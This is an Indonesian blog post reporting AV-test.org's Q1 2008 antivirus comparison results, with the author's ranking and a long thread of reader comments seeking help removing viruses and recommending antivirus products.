484

Antivirus Terbaik Tahun 2008

Antivirus Terbaik 2008 Q1

Di kuarter pertama tahun 2008 ini, AV-test.org yang bekerjasama dengan AV-Test GmbH (Jerman) selesai mengadakan berbagai test membandingkan sekitar 28 Antivirus. Semua produk diambil dari versi terbaik yang diupdate pada tanggal 7 Januari 2008 dan ditest didalam sistem operasi Windows XP SP2 (English). Hal ini tentu saja merupakan Informasi dan test yang sangat bermanfaat sebagai referensi untuk memilih Antivirus.

Pengetesan-pengetesan itu adalah sebagai berikut :

  • Signature-based test
  • False-Positives-Test ( kesalahan mendeteksi virus )
  • Proactive detection
  • Reaction times
  • Rootkit detection (12 active samples)

Test ini untuk mengetahui akurasi Antivirus mendeteksi berbagai jenis virus yang ada. Pengetesan digunakan sample berbagai virus, trojan horses, backdoors, bots dan worm yang berjumlah lebih dari 1 juta (1.024.381 sample). Semuanya merupakan mallware yang menyebar selama 6 bulan terakhir. Pengetesan dilakukan dengan memberikan rating “very good” (++) terhadap Antivirus yang mampu mendeteksi lebih dari 98% mallware tersebut.

Pengetesan kedua dilakukan untuk mengetahui prosentase kesalahan mendeteksi file yang bersih. Untuk ini digunakan 65.000 clean files, dan hasilnya memberikan predikat “very good” (++) jika antivirus tidak mendeteksi kesalahan.

Proactive detection untuk mengetahui seberapa aktif Antivirus mampu mendeteksi virus-virus baru atau kemampuan mendeteksi ketika database virus belum diupdate ( misalnya belum diupdate selama satu mingggu ), selain itu juga kemampuan mendeteksi terhadap virus yang senantiasa merubah diri. Reaction times merupakan test untuk mengetahui seberapa cepat perusahaan Antivirus menanggapi menyebarnya virus baru, berdasarkan 55 sample di tahun 2007. Jika reaksi yang diberikan kurang dari 2 jam akan diberikan predikat “very Good” (++). Test terakhir untuk mendeteski keberadaan Rootkit, dengan menggunakan 12 sample.

Bagaimana Hasilnya ?
Berikut hasil dari masing-masing test tersebut :

Signature-based Detection :

Kemampuan mendeteksi dari 1.024.381 sample virus.

Nama AntiVirus Terdeteksi Prosentase
WebWasher (gateway product only) 1023742 99,9%
AVK 2008 1022418 99,8%
AntiVir 1020627 99,6%
Avast! 1018204 99,4%
Trend Micro 1009662 98,6%
Symantec 1006849 98,3%
AVG 1005006 98,1%
BitDefender 1003902 98,0%
Kaspersky 1003470 98,0%
Ikarus 1002894 97,9%
Sophos 1001655 97,8%
F-Secure 999806 97,6%
Microsoft 992880 96,9%
F-Prot 986961 96,3%
Panda 979409 95,6%
Rising 962674 94,0%
Norman 962191 93,9%
McAfee 959919 93,7%
Fortinet 957558 93,5%
Nod32 953936 93,1%
Dr Web 887736 86,7%
VBA32 885313 86,4%
QuickHeal 862919 84,2%
ClamAV 791505 77,3%
Command 729233 71,2%
VirusBuster 693944 67,7%
K7 Computing 571329 55,8%
eTrust-VET 566161 55,3%

 

False-Positives (FP) Test

Very Good
(0 FP)
Good
(1 FP)
Satisfactory
(2 FP)
Poorly
(3 FP)
Very poor
( > 3)
eTrust-VET
McAfee
Microsoft
Symantec
AntiVir
AVG
Command
F-Prot
F-Secure
Nod32
Norman
Sophos
Trend Micro
VirusBuster
Avast!
AVK 2008
BitDefender
Dr WebK
7 Computing
Kaspersky
Panda
QuickHeal
Rising
VBA32
WebWasher
ClamAV
Icarus
Fortinet

 


Proactive Detection :

Very Good Good Satisfactory Poorly Very poor
BitDefender
Fortinet
F-Secure
Nod32
Panda
Sophos
WebWasher
AntiVir
AVK 2008
Dr Web
Ikarus
Kaspersky
McAfee
Norman
Symantec
Trend Micro
VBA32
Avast!
AVG
QuickHeal
Rising

 

 

ClamAV
Command
eTrust-VET
F-Prot
K7Computing
Microsoft
VirusBuster
 

 


Reaction Times:

Very Good
(< 2 hours )
Good
( 2-4 hours)
Satisfactory
( 4- 6 hours)
Poorly
(6-8 hours)
Very poor
( > 6 hours)
AntiVir
AVK 2008
ClamAV
Kaspersky
WebWasher
Avast!
BitDefender
Sophos
Trend Micro
Fortinet
F-Secure
Ikarus
Nod32
AVG
Command
Dr Web
F-Prot
Norman
Panda
QuickHeal
Rising
Symantec
VBA32
VirusBuster
K7 Computing
McAfeee
Trust-VET
Microsoft
 

 

Rootkit Detection

Very Good
(all detected )
Good
( 1 not detected)
Satisfactory
( 2 not detected)
Poorly
(3 not detected)
Very poor
( > 3 not detected)
F-Secure
Panda
Symantec
Trend Micro
AntiVir
Avast!
AVG
BitDefender
Dr Web
eTrust-VET
Kaspersky
McAfee
Nod32
Sophos
F-Prot
Ikarus
Microsoft
Norman
Rising
VBA32
VirusBuster
VirusBuster
AVK 2008
QuickHeal
ClamAV
Command
K7 Computing
 

 

Kesimpulan

Berdasarkan test-test diatas memang tidak ada antivirus yang paling unggul disemua tahap pengetesan. Tetapi paling tidak bisa diambil beberapa antivirus yang cukup bagus dari kesemua test. Beberapa test mungkin tidak terlalu penting untuk diperhitungkan, seperti reaction times. Waktu reaksi 6-8 jam pun bisa dikatakan cukup bagus bagi kita. Selain itu Rootkit detection juga bukan hal yang begtu penting, mengingat saat ini masih sangat jarang jenis rootkit ini. Jadi kesimpulan disini hanya menilai dari tiga test sebelumnya. Dan ini pun mungkin sangat subyektif. Berikut Urutan Virus terbaik versi ebsoft berdasar test-test (3 test pertama) diatas :

  1. AntiVir. Hampir disemua test mempunyai hasil yang sangat bagus. Ditambah lagi Antivir menyediakan versi Gratis, walaupun tidak semua fasilitas disediakan. Memang kadang masih salah mendeteksi beberapa file yang bersih sebagai virus. Antivir Web site
  2. AVK 2008. Antivirus ini mungkin jarang kita dengar di negeri kita, tetapi berdasarkan test diatas, menduduki peringkat tertinggi dalam mendeteksi virus. Tetapi hal ini harus dibayar dengan kesalahan mendeteksi yang dihasilkan. Selain itu AVK merupakan antivirus berbayar, belum ada versi gratisnya. Selengkapnya bisa dilihat disini GData Secutiry Labs
  3. Avast. Hasil mendeteksi virus cukup bagus. Selain itu Avast juga juga menyediakan versi gratis, yang bisa di download langsung dari websitenya. Selengkapnya disini
  4. Trend Micro. Selengkapnya disini Trend Micro
  5. Symantec. Selengkapnya buka Symantec web site
  6. AVG. Versi gratis bisa download di http://free.grisoft.com
  7. BitDefender. Selengkapnya tentang BitDefender disini
  8. Kaspersky. Selengkapnya

Update
Test Antivirus terbaik 2008 tahap kedua sudah ada. Untuk melihat hasilnya, silahkan dibaca artikel berikut : Test Antivirus Terbaik 2008 tahap kedua

 

Referensi

  • http://blog.chip.de/0-security-blog/security-suiten-2008-im-test-q12008-20080122/
  • http://www.av-test.org/
  • http://news.softpedia.com/news/The-Best-Antivirus-in-2008-77419.shtml

 

484 Comments

  1. Makasih untuk infonya. Tapi menurut saya ada yang juga ga kalah penting daripada ‘sekedar’ mendeteksi virus; yaitu kemampuan antivirus melakukan ‘pembersihan’ terhadap virus-virus yang dideteksi. Meskipun bagus dalam mendeteksi virus tapi tidak bisa menghilangkannya/ga bisa kasih solusi, tetep saja si virus2 itu ‘ngendon’ di komputer kita. CMIIW.

  2. Ada baiknya dikasih kesimpulan akh. Overall summary. Jadi pembaca bisa memutuskan antivirus apa yg mau dipakai.

  3. Terimakasih atas masukannya..
    @Faisol
    Memang seperti itu.. tetapi jika virus belum aktif dikomputer, maka hampir dapat dipastikan virus dapat dihilangkan..
    Tetapi kalau virus sudah aktif, hampir semua antivirus biasanya tidak mampu menghilangkan…

    @Aswad
    Iya… saya coba update artikelnya. Jazakallah akh..

  4. kompy saya pernah kena virus ( trojan ) <— dah 3 bulan nongkrong di dalam kompy
    saya coba 1. antivir classic
    2. avg
    3. kasversky
    4. pc media
    5. trojan elite
    dan terakhir saya gunakan ansav + dan smadav <——– baru koid….hhehehe….thx infonya….mo coba avast jg ahhh…

  5. komputer saya pernah terkena virus worm,trojan & pendekar blank.kemudian saya coba dengan:
    1.mcafee professional 7 update 1 january 2008
    2.nod32 update 30 desember 2007
    3.avg update 30 january 2008
    dan yang terakhir norton ghost 2008.
    tetap aja gak bisa.
    untung ada avira, jadi saya bisa bebas mencopi file temen,
    he,..he,….he,…….

  6. tank info untuk milih2 milihnya q dulu suka bgt ma avg tpi nth mengapa eh mengapa sekarng untuk updatenya rada susah harus milih2 tanggal yang paling update n banyak pilihannya n membuat lama pula downloadnya klo diwarnet apalagi,trz juga klo ga berhasil komp langsung hank,sory ya buat vendor avg tapi itu sebagai masukan aja jgn dibikin ribet updatennya tankss..tapi aq teteap pake avg n kadng2 avira tanks antivirus pimp my computer from VIRUS

  7. Terima kasih infonya, penting banget.
    Ada yang sudah kena virus AVI?
    Aduh itu virus nongkrong terus di komputer teman saya, jadi pada takut mau masukin flash disk ke dia, soale pasti kena dan ga bisa dihapus.
    Ada yang bisa bantu?
    Terim kasih

  8. Komputer saya pernah terkena virus trojan horses saya sudah pakai antivirus avg tapi koq muncul lagi ya, pakai apa supaya bisa hilang total?
    satu lagi saya pakai komputer dikantor ada virus namanya fooool trus udah pakai anti virus kispersky tapi gak hilang, trus sekarang komputer saya jadi suka hank, antivirus apa yang harus saya gunakan

  9. saya jg memakai Kaspersky anti virus sejauh ini dy proaktif bgt mendeteksi dan menclean virus yg masuk cz tiap hari saya update mungkin mbak liana bisa coba lagi

  10. awalnya saya pk avira dan pcmav, tapi pas terakhir kena trojan atau worm gitu, aviranya kena dinon-aktifkan sama virus, saya pindah ke kaspersky sampe sekarang…

  11. saya pake avast cukup bagus, kalau terdetek ada virus biasanya filenya dilock sama avast jadi ga bisa aktif file-nya, walaupun kita coba klik, padahal sudah saya pilih ignore di popup avastnya. 😀

  12. alhamdulillah dengan adanya aplikasi shollu salah satunya kita akan selalu ingat allah dimanapun itu……

  13. dikomputer gw ada virus vbs..udah gw cobain pake avg n antivir kagak ilang2..akhirnya baru ilang pake bitdefender 2008

  14. Saya mw tanya nih…….

    apa Reistration Key dari XP antivirus ver. 2.4??

  15. bagus juga tauwa infonya. tapi kenepe yach? PCMAV yang buatan ina itu kaga masuk kategori. padahal itu juga AVIR terbaik yang saya pernah pake

  16. gimana caranya dapetin get data back free?. yang gue dapetin cuma trial (itu pun demo nya aja)

  17. makanya kalo kena virus langsung ngadu donk ke mentri.. mentri apa aja terserah loe..

    gakgakgakgakgak…

    bcabda deeeeeeeeenk…

  18. EH SKALIAN MAU CARI TEMEN DUNK..
    BOLEHKAN…?
    KALO BISA CI CEWE…
    LANGSUNG CALL AJA YA KE 021-32147082..
    THAAAAAAAAAAAAAAAAAAAANKS..

  19. Thank atas info anvir-nya… yang pasti gw pengen coba soalnya hp kena virus padahal dah di scan ma PCMAV v.24 tetap file yg di hp gw dihide sama virus…. :'(

  20. Saya pakai KASPERSKY INTERNET SECURITY(KIS) 6, ampe skrg compi gw masih mantab aja, update KIS tiap hari, setting antivirus dan firewall pada high level. Mudah2n compinya adem ayem… kayak compi gw selama pk KIS… kgk pernah ngalamin gangguan virus!!!

  21. Deepfreeze yg terbaru ajalah :D, bisa ditembus ga sih yg versi administrator 6.20.220.1692 ?Udah ada deep unfreezenya ?

  22. seperti yg dibilang ebta

    Tetapi kalau virus sudah aktif, hampir semua antivirus biasanya tidak mampu menghilangkan

  23. Dear ebta
    bantuin saya dong komputerku berat banget,kalo lg buka exel lama banget,apa komputerku kena virus ya,saya juga sering clean virus pake PC MEDIA,tp hasilnya sangat mengecewakan,help me dong…Thanx.

  24. komp saya kna virus yg ngerubah file saya jd file sistem, g bisa dibuka (di simpan di partisi data, bkn sistem) kl di klik kanan kl file rar ga ada link extractnya, trus kl file lain, yg ad cman 3 4 pilihan, paling pake jalur open with, tetep g kbuka. nah kl dilihat size folder, folder is empty katanya. slama ini nyrang folder aja, trmasuk rar, di dlmnya file pdf.

    kl di delete, di rexycle bin muncul llg srzenya tp kl direstore blk lg empty.

    tolong carikan anti virnya. pcmav,ansav,avg,b defender g mempan. ansav, brhnte di rngh jalan kl scan folder yg sdang trjangkit, tp kl dah rubah g dianggap virus.

    trims_jelita

  25. menurutku, bitdefender masih terbaik, dan jauh lebih mantab dibanding noron… gue banget deh

  26. toloooooooooooooooooooooong flashdisk ku kena virus
    mula2 flashdisknya ku scan menggunakan pc mav 0.1 final release ternyata tidak ada virusnya. kemudia ku scan menggunakan avira ternyata banyak dapat virusnya semua virus saya hapus kemudian esoknya saya pasang lagi ternyata virus masih nempel di flashdisk gimana ya cara mengatasinya?

    Sebelumnya PC-nya harus dipastikan bebas virus… kemudian flashdisknya baru discan. Kalau PCnya masih terinfeksi, maka kemungkinan virus juga selalu menular ke Flashdisk..

  27. Asslmkm wr.wb,
    Mas saya sangat berterimakasih sekali setelah sekian lama saya mencari di dunia maya, menemukan sebuah web yg gitu bagus, moga ilmu serta pelajaran yg mas sebarluaskan, mendapat Imblan yg lebih dari Allah SWT.
    Amin yarabbal Allamin,

    Wa’alaikumsalaam warahmatullah wabarokatuh..
    Amiin.. Jazakallah khoiron

  28. Ass. Wr. Wb
    Terima kasih ya…semua softwarenya bermanfaat bangett!! alhamdulillah free alias gratis. saya berterima kasih lagi…website yang bagus…

  29. ehm aku masih bingung nih…tiap kena virus selalu ke hidden…kira2 gimana caranya supaya bisa tampil lagi and gimana efek ke komputer..masalah aq tiap kali kena virus selalu diinstal ulang…nah..menurut anda klo instal ulang mulu akan rusak ga?ke komputer ya???

  30. mohon bantuan teman2, kompi aku kena virus galuh.vbs cara ngilangin virus King of Galuhtolong donx cara ngilangin virus King of Galuh. kalo aq delete pasti ada lagi, ada lagi…
    file nya ada 2. file autorun.inf (100 Bytes) & galuh.3gp.vbs (8.659.504 Bytes). kalo saya buka Run, disitu ada tertulis King of Galuh. gw dah coba hapus pake regedit. tp ternyata ga bisa juga. please donx tolongin…

  31. komp aq kna virus!!!system sm datany..
    smpe2 ga bs broprasi(kdng2 c bs)??
    tolongin dong??
    anti virus ap yg plng baik & tepat utk komp sy??

  32. Tq bwt infona n moga aja sll dapet intuisi yang lebih baik lagi,Amin.
    Oiya apa AVG n Avast bila di dlm satu PC dpt terganggu kinerjanya mengingat sy sll g lupa update Avast n AVG walo free.
    Satu lagi, napa sih d dlm PC sy Avast sll detect lbh dl ketimbang AVG n kadang AVG g mampu detect itu virus ato bkn?
    Contoh : Virus Tati.exe
    AVG ga bs detect n report Tati.exe bagian dari Windows.
    Avast detect n langsung dibasmi tp imbasna file yang ditumpangi Tati.exe jg ikut hilang.
    Mohon penjelasan..
    Tq

  33. gw mo tanya, gimana cara update anti virus kaspersky tanpa langsung internet……………………….
    ……………..tolong ya……………bls ke e-mail atau cara download update terbaru………….

  34. Tolong berikan petunjuk bagaimana cara download update anti virus terbaru 2008

  35. semalam saya install avast n trus minta full scan dari boot. ternyata ada banyak file yang terinfeksi virus win 32:virut. saya pilih move to chest.setelah selesai malah komp saya jadi error.tampilan desktopnya kosong.ternyata applikasi explorernya jadi hilang. tolongin dong… antivirus apa yang ok? saya rencananya mau ganti ke avg or bit defender.mohon sarannya…

  36. coy, w bingung bgt! anti virus w hlng sendiri ? lo tau ga penyebabnya apa?

  37. Yg Palingbagus itu anti virus
    avg sama PC MEDIA yg sekaligus dipakai dikomputer

  38. Mencegah, lebih baik drpada mengobati. Waspada lebih bijaksana.

  39. halo semua…….. setelah baca2 isi web ini. aku jadi teringat dengan komputerku yang terkena virus tak dikenal padahal aku sudah pakai symantec.sekarang komp ku bermasalah,hampir setiap malam aku kewarnet cari info tentang cara balikin file ku yang hilang ketelan virus jahanam tadi,tapi blum ketemu2. file2 yang aku haiden semuanya hilang ga tau entah kemana.? trus pada folder option,view pada show hidden dan don show hidden dua2nya kecentang,dan ga bisa dipilih salah satu. bantuin donk.. bagi yang tau caranya.

  40. Trims ats segala informasi tentang anti virus yang mana harus dipilih diantara anti virus yang cocok untuk menghapus virus yang berada di komputer saya.

    Coba dulu Antivir Personal Edition dengan update terbaru, atau jika virus lokal gunakan PCMAV atau ansav

  41. mao nanya dunk para profesional kalo device manager tidak ada isinya atau hilang semua di root hardwarenya penyebabnya virus apa bukan ya?
    saya sudah periksa bukan karena hidden seh

    terima kasih

    Bisa juga karena virus, apa di task Manager juga sama? Atau sistem windowsnya ada yang error..

  42. saya bingung dengan perkembangan virus2 akhir-akhir ini yg merusak komputer (kayak penyakit aja), antivirus yang tokcher buat basmi virus2 yang berkembang pesat?????????

  43. cuman numpang tanya Mas, kalau kita sdh pakai AVG, trus install AntiVir apa crash antara ke dua antivirus tsb? Juga apakah antiVir bisa menumpas spyware sekalian?
    thanks

  44. @sestiono
    Hampir semua anti-virus dengan update teratur bagus, Untuk yang gratis seperti Antivir, AVG dan Avast. Tapi tujuan utama anti-virus adalah untuk mencegah virus, jika sudah terserang virus, maka kadang susah untuk membasminya dengan anti-virus.

    @Munie
    Bisa pakai dua-duanya, tetapi kemungkinan terjadi saling me-lock (mengunci) virus, sehingga untuk menghapus virus, salah satu harus di non aktifkan terlebih dulu. Untuk Antivir Free Edition tidak menyertakan anti-spyware.

  45. klo kombinasi antivir sama kaspersky ada efeksamping g yaaa?????

  46. gak apa-apa tapi ofkan dulu restore nya pda msconfig salah satu antivirus agar tidak saling lock

  47. aq tanya lagi bedanya versi trial sama bayar itu apanya????
    sama caranya mematikan salah satu antivirus ,apa cuma di ignore waktu ndetect.

    gout, emang caranya mengofkannya gimana pada msconfig???

  48. Kalau versi trial itu fasilitasnya sama dengan versi yang bayar, hanya saja penggunaannya dibatasi waktu, misalnya 30 hari. Setelah itu tidak bisa dipakai lagi.

    Untuk mematikan antivir, klik kanan icon-nya dan hilangkan cek pada menu “Antivir Guard Enable” untuk Avast pilih menu “Stop on-access protection” kalau AVG meski dinonaktifkan, tetapi sepertinya masih ngelock, jadi harus di restart dulu.

  49. jadi klo versi trial itu klo udah habis batas waktu g bisa dipakai lagi dan harus nginstal ulang gitu…..???
    ada g versi gratisan antivirus yang bukan versi trial????
    klo avg yang versi 8, kaspersky internet security yang versi 7,sama antivir yang personal edition itu temasuk versi trial atau gratisan?????
    mkasih buat yg mau sharing

  50. pa kbr mas….
    mo nanya nih!!
    system C saya atau hard disk saya bermasalah ga???
    coz system C setelah saya defragmenter ada warna hijau yang ga bisa ilang gitu kan klo nomal mah wananya biru
    ya ga semua sih…..
    apa nanti bakalan tambah banyak yang warna hijau itu????
    trus bisa di ilang ga tau dibenerin???
    plissssssssss……….
    bales……..

  51. kalo aq pake antivir, emang menurut q antivir cukup bagus….kalo g percaya, buktikan aj sendiri…
    Eh tapi updatenya itu kadang error, gimana caranya update antivir yang benat?????

  52. malam? notebook aq masalahx, gak mau terbuka run, apa ada firus ya di C. tapi aq udah coba antivrus kaspersky. tp gak mumpan, solusinya apa ya. makasih

  53. Wah… gimana nich??
    “Tris 2007” Kayaknya lum bisa di basmi!
    aku bingung …..
    ada antivirus yang OK punya ?
    aku udah coba pke AVG 7.5,and Avira koq lum bisa?
    ada yang punya AVG free versi 8 ?
    kirim yach kesini :
    gemilang_89@plasa.com

  54. menurut saya pake deedfriz aja bisa membantu kom kita dari ancaman virus

  55. …. Om-om… dapetin deepfreeze full version dimana yah…

  56. tolong aku donk karena komputerku kena virus repvblik dan kalong

    anti virus yang harus aku gunakan apa karena banyak antivirus sudah aku coba tapi tidak bisa hilang tu virus???????

    terima kasih banyak.

  57. assalamu alaikum.slam knal tuk smuax.Q bru tau klo disni ada forum berbagi ilmu.klo Q liat dari smua komentar smuax bgus n saling mmbantu.bgitulh yg namax sebangsa dan se tanah air sling berbagi. Q jg pux msalah dengan komputer.Q pux komputer terinfeksi virus win32.virut.q.dah brulang kali Q hapus tpi stiap di scan pasti ada lgi yg di dapat.Q pake Anti Virus Kaspersky.klo bleh nax nich bwat yg pux saran gmana crax hilangin tuch virus dri komputerku.

  58. thank 4 everything…. unt info anti virusnya. Mau nanya klo flash disk file didalamnya masih ada, trus diilangin bisa tp setelah dilepas trus dicolokin lagi… filenya kok ada lagi… coba format jg ga bisa… heee3x (apa flashdisknya dah rusak ya). Klo ada yang tau solusinya! kasih tau ya….

    Matur suwoonn…..

  59. terima kasih atas infonya,klo flash disk file didalamnya masih ada, trus diilangin bisa tp setelah dilepas trus dicolokin lagi

  60. MENGAPA SETELAH MENGAPDATE ANTIVIRUS,SIGNATURENYA NGGAK MAU BERUBAH,KOK TETEP TANDA TANYA…?AGUS KASPERSKY

  61. slm kenal semuanya,terimakasih banyak atas info yang diberikan,ngomong2 masalah virus, coba temen2 buka website http://www.vaksin.com,disana banyak info tentang virus yang meraja lela,baik ciri2 maupun cara pembasmiannya,tahnk’s

  62. assalamu’alaikum… jazakallah khoir ya informasinya…
    oya mo nanya, klo boleh tau pak Ebta pake antivirus apa?skarang ana pake fsecure diinstalin temen tapi ribet updatenya..so lagi nyari info antivir yang ok.
    mo konsul juga, temen ana komptnya rada2 erorr,diprogramnya microsoft word tipenya shortcut so klo mo buka word lwt dokumen word dulu,beberapa program juga ga bisa jalan, truss keybordnya ga bisa masuk-kadang bisa,kadng ga.tu knpa ya?padahal udah discan virusnya…
    af1 mo nanya lagi, program restore sebenernya letaknya dimana klo dah diinstal?dikompter temen, letaknya di D trus ga bisa dihapus.recyclednya jg di D ga bisa di hapus, apa mesti diuninstal dulu ya?hehe af1 blom tahu banyak masalah program kaya ginian^_^v
    jazakallah khoir….

  63. bwt ngehilangin trojan horse gmn ya??
    gw dh cb anvir,avast,bitdefender ttp aj g bs,,,,

  64. oya, temen2,kalo ada yang punya driver C-Media AC’97 Audio Device, ane minta tolong dikirimkan ke e-mail ku yach e-mailnya edo9aw4bst@gmail.com, tolong yach,aku dah nyari kemana2 g dapat2, thank’s b4

  65. Saya ingin menanyakan bagaimana cara mengatasi virus yang menginfeksi comp saya dengan ciri-ciri: kalo dibuka data yang terinfeksi akan menyebabkan penduflikasian program notepad padahal saya tidak membuka notepad. Dan juga semua file program di Disk C juga sudah terinfeksi sehingga membuat sistem semakin berat. Saya mohon bantuannya, bagaimana cara mengatasi masalah tersebut karena sudah saya coba dengan avg versi lama, NOD, Avast tidak mau hilang juga tetapi kalau kedetect ya kedetect, namun virusnya tak amu hilang dari compKu.Walaupun udah di-heal berkali-kali. Kalau anda mempunyai antivirus yang dapat mendelet virus tsb, tolong kirim ke alamt email saya. Trims for attention…..

    Jawabannya saya kirim via email…

  66. saya ingin ty gmn install ulang laptop yang kena virus kalo misalnya dah disave data yang penting,trus harus ada cd khusus ya untuk install ulang, emg kalo mau nyimpen program kayak ms word,excell,adobe,games,recycle,winamp,my computer,my document itu ada cd khusus buat nyimpen programnya tsbt ya?ato gmn cr yg rinci,apa maksudnya membuat windows boot disk / rescue disk pada disket floppy,gm crnya?trus bila ada program tune up apkah jg msh bisa tersimpan bila saat repair dgn program tersebut ditemukan kerusakan pada systemnya,tolong bantu saya y

  67. @kia
    Untuk menginstall ulang harus ada CD Windows dan CD Driver laptopnya (harusnya disertakan ketika membeli laptop/komputer).
    Program yang lain (Ms Word, Excel, adobe, games dll) juga harus di install ulang lagi.

    Windows boot disk/rescue disk merupakan salah satu cara yang dapat digunakan jika windows tidak bisa booting atau mengalami kerusakan, meski seringnya tidak begitu banyak bermanfaat.

  68. pake NOD32 update 1 april 08, sekarang pake AVG 8 update tiap hari dan KIS 7, sekarang lagi ngupdate nih 🙂
    dulu pake avira, kalah sama pendekar blank 🙁
    gak mau pake pcmav, sama KIS kebaca virus lhoh

    matur nuwun infonya

  69. Trim Informasinya, memang virus tidak bisa dihilangkan tetapi disiasati. Sungguh bioadab yang bikin virus kaya akagak ada pekerjaan saja, mbok bikin anbti miskin gty

  70. Kalo bikin jangan virus napa. tapi bikin apa yang bermanfaat bagi orang lain. Sdah harga komputer mahal di rusak orang yang pinter tapi pikiran dan jiwanya rusak membuat orang lain susah aja.

  71. ilangin VIRUS BLUE FANTASY GIMANA YA???????? pake ansav ga bisa

  72. BLUE FANTAT bikin MY KOMPY GA BSA ALIAS RUSAK MAKLUM PTM 2

  73. 🙂 SEMUA ANTI VIRUS ITU BAGUS HANYA SAJA KITA NGGA’ TAHU KEKUANGAN MASING-MASING🙂

  74. Hai Pembaca yang budiman,komputer saya sudah 2 bulan kena virus GoKiLL, tapi tidak hilang2 setelah menggunakan anti virus AVG and NOD

  75. hallo,gue bingung banget nh,soalnya setiap aku mau buka website selalu aja terhubung sama antivirus-antivirus yg palsu(memaksakan utk men download/save file) jadinya gue ga bisa buka website itu,sedangkan dengan laptop lain bisa di buka website itu,saya bingung kenapa kayak gini,terus apa yg harus gue lakukan?memformat?tetapi saya memakai macintosh juga,help me pleaseeeeee!

  76. Pingback: Hello world! « Dnsjpc’s Weblog
  77. Cara plg ampuh Klo dah kna virus VIRUT.gmana
    tlong bngt !!!!!!

  78. mas tolong tolong dan toloooooooooooooooooong
    program ms wordku gak bisa dibuka kalo dibuka tulisannya hanya kotak-kotak banyak gak karuan tolong……… tolongin karena data perusahaanku selam 15 tahun

    thank u
    parwanto

  79. boz.,antivirus apa yang paling ampuh untuk membunuh virus-virus yang brengsek
    please help me……………………….

  80. @ #99
    coba search di ebsoft, ada penjelasan tentang menangani virut, sepertinya di komentar. kalau tidak salah download removernya dari AVG..

    @wanto
    Mungkin disusupi virus, ada artikel cara mengecek hal ini di ebsoft, bisakah dikirim sample-nya ?

    @o’cir #101
    kalau virus lokal, bisa dicoba PCMAV, kalau tidak coba gunakan Antivir

  81. Dulu saya pernah kena virus “halmanahe”,saya juga sudah coba pakai AVG 8.0,Antivir Professional dan Avast.Tp hasilnya “nihil”.Malah yg lebih gila lagi semua isi hardisk saya yg ext.”.exe” dibabat habis sampai kedelete.Namun suatu hari temen saya menganjurkan untuk memakai Kaspersky 7.02 dan akhirnya,,,kinclong…semua file .exe saya selamat karena cara kerjanya meng-disinfect virus tsb.Akhinya dunia menjadi aman dan tentram kembali.Terimakasih Kaspersky….

  82. seumpamane kita pakek 2 atau lebih anti virus pada komputer kita apa yang akan ber akibat padfa PC kita

  83. Akibatnya bisa menyebabkan kerja komputer menjadi lebih lambat dan antivirus saling me-lock (sehingga tidak bisa menghapus/memproses virus).

  84. ga usah pke 2 AV, pke aja Avira Antivir udah cukup bagus kok bwat basmi virus dan sejenisnya. bwat antispywarenya pke spybot search&destroy dan a-squared free. bwat AV Lokal PCMAV juga udah bagus. itu semua ada di komp. gw dan freeware smuanya.. maklum klo harus beli kan mahal.. , trus jgn buka situs2 yang begituan.

  85. Tidak pernah senyaman ini saya menggunakan PC yang terkait LAN dan WAN… setelah saya gunakan kombinasi ad-aware dan avg 8.0… trojan horse dkk pun urung masuk. ad-aware adalah antivirus terbaik menurut saya dia bisa medeteksi virus dan mallware dan kerusakan pada log registry dengan tidak merendhkan hasil polling virus terbaik diatas… pokoke lengkap deh dengan penambahan avg 8.0 yang resisten di memory.
    ad-aware dan avg terbaru sedot aja di http://www.filehippo.com... gratis kok!! moga menjadi berkat bagi semuanya

    jah bless… dexter

  86. Saya setuju dengan Ojib ….
    Avira antivir di temenin sama spybot search&destroy
    sebagai tambahan biar makin maknyusss saya pake SuperAntiSpyware (khusus untuk superantispyware tidak di aktifkan real-time)

    NB: terbukti selama 2 tahun jaga warnet, kompi operator blm prnh dijebol virus dan antek2nya.(sebelumnya pernah kena virus pas waktu pake AVG 🙂

    so …..AVIRA ANTIVIR ==> Antivirus Terbaik Tahun 2008

  87. anu gw g tlalu ngerti tentang perkomputeran dn isinya
    yg jelas gw da masalah dengan virus yg nge jogrok dah lama di kompi wa. gw jga g tau tu virus ato pa.
    sebut saja virus SPIRAL. u ngubah smeua file mp3 wa jdi flash exe gitu dh gw g ngerti. jdi klo di buka cuma gambar spiral muter2 gtu.

    tolong di bantu memecahkan masalah ini.
    sangat di harapkan.

  88. YA SANGAT SETUJU THE BEST ANTIVIR IS AVIRA!!CUMA SAYANG UPDATENYA KUMULATIV,,AGAK LAMA JUGA NUNGGU UPDATENYA KHAWATIR VIRUS2 BARU,,TAPI HEURSITICNYA EMANG SUPER,,,SEMUANYA SUPER DEH,,TWO THUMBS UP FOR AVIRA,,KEEP BEING THE BEST

  89. @hariez
    sudah di coba install antivirus ?

    @Nasser
    Sebenarnya yang disayangkan ukuran Update yang terlalu besar, karena update dijadikan satu. Kalau Update tergolong cepat, sehari bisa update sampai 7 kali. Coba di cek di informasi update..

  90. Gimana sih cara na menghilangkan virus tati,viruz ini sangat sulit dihilangkan..dan apakah anti virus model sekarang bisa menghilangkan virus tati yang sangat sulit dihilangkan..

  91. @Firlan
    Bisa, saya menggunakan Avira dan sebelumnya bisa mendeteksi. Tapi itu mungkin karena virusnya sudah menginfeksi komputer, jadi antivirus yang ada tidak berdaya.

    Saya berencana menulis tentang beberapa teknik membasmi virus yang terlanjur menginfeksi komputer.. coba nanti di cek

  92. Pingback: Antivirus Terbaik Tahun 2008 « ~ Budi Ridwin ~
  93. Pingback: Anisa Cell » Blog Archive
  94. Pingback: Apa itu System Volume Information ? (ebsoft.web.id) « Computer and Tech Blog
  95. wah ini situs oke punya jadi tambah banyak pengetahuan trus lengkap lagi…..
    terimakasih banyak deh buat kretornya
    moga tak kehabisan bahan
    dan terus berjaya…

  96. Pingback: Anisa Cell » Blog Archive » Antivirus gratis baru : RISING Antivirus 2008 Free Edition
  97. Pingback:   Apa itu System Volume Information ? — Mamay Syani in dunia Maya
  98. afaik,
    saat ini antivirus freeware yang punya kemampuan scan sebelum windows melakukan system restore cuma avast (boot time schedule). biasanya hasilnya sangat memuaskan, dibandingkan dengan scanning saat windows active..

  99. Makanya jangan pake windows, pake donk linux apa mac. ga ada istilah serangan ganas-critical

  100. Pingback: Apa itu System Volume Information ? «
  101. …Aku suka banget dengan Artikel ini, terimakasih ya Mas… Aku sekarang pakai Avira Antivir, BAGUS banget… Aman deh data2 skripsiku dari virus2 gak karuan hehehe… Sukses buat IT indonesia semuanya ya… 🙂

  102. Mkasih ni mas jadi dpat ilmu lagi nechh,,
    Tetap aja product symantec paling topp abiss dech,,
